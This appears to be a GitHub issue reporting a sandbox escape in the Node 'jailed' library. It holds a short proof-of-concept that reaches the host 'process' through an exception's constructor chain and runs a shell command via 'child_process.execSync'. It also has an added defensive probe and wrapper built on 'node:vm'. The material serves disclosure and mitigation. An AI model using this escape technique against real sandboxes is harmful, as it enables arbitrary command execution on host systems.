Open seongil-wi opened 1 year ago
Jailed version: 0.3.1
Node version: 18.15.0
run-jailed.js

```js
var jailed = require('jailed');
var api = {};
var plugin = new jailed.Plugin('./test_case.js', api);
```

test_case.js

```js
try {
    setTimeout().ref();
} catch (pp) {
    pp.constructor.constructor('return process')().mainModule.require('child_process').execSync('touch flag');
}
application.disconnect();
```
The sandbox can be escaped by calling the `setTimeout().ref()` function. Also, we can execute arbitrary shell code using the `process` module.
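
The test case above relies on a caught exception whose constructor chain reaches a `Function` constructor from outside the sandbox. The following is an added example, not code from the issue or from jailed: it assumes a sandbox built on Node's built-in `vm` module, and `PROBE`, `guard` and `audit` are hypothetical names. It reports which values handed to sandboxed code carry a foreign `Function` constructor, first with `setTimeout` exposed directly and then behind a wrapper compiled inside the context.

```javascript
const vm = require('node:vm');

// Runs inside the context and lists what sandboxed code can reach whose
// constructor chain ends at a Function constructor other than the context's.
const PROBE = `(function () {
  const leaks = [];
  if (timer.constructor !== Function) leaks.push('function');
  try {
    timer(); // no callback, so the host timer throws
  } catch (e) {
    if (e.constructor.constructor !== Function) leaks.push('exception');
  }
  return leaks.join(',');
})()`;

// Mitigation: compile the wrapper inside the context so the function is
// context-realm, rethrow host errors as context-realm errors carrying only a
// string message, and return nothing (a host Timeout object would leak too).
function guard(context, hostFn) {
  const make = vm.runInContext(`(function (hostFn) {
    'use strict';
    return function (...args) {
      try { hostFn(...args); }
      catch (e) { throw new Error(String(e && e.message)); }
    };
  })`, context);
  return make(hostFn);
}

// Builds a fresh context, exposes `timer` as chosen by `expose`, runs the probe.
function audit(expose) {
  const context = vm.createContext({});
  context.timer = expose(context);
  return vm.runInContext(PROBE, context);
}

console.log('direct :', audit(() => setTimeout));
console.log('guarded:', audit((ctx) => guard(ctx, setTimeout)));
```

Node's documentation states that `node:vm` is not a security mechanism, so a wrapper like this narrows one path and does not make in-process isolation safe for untrusted code.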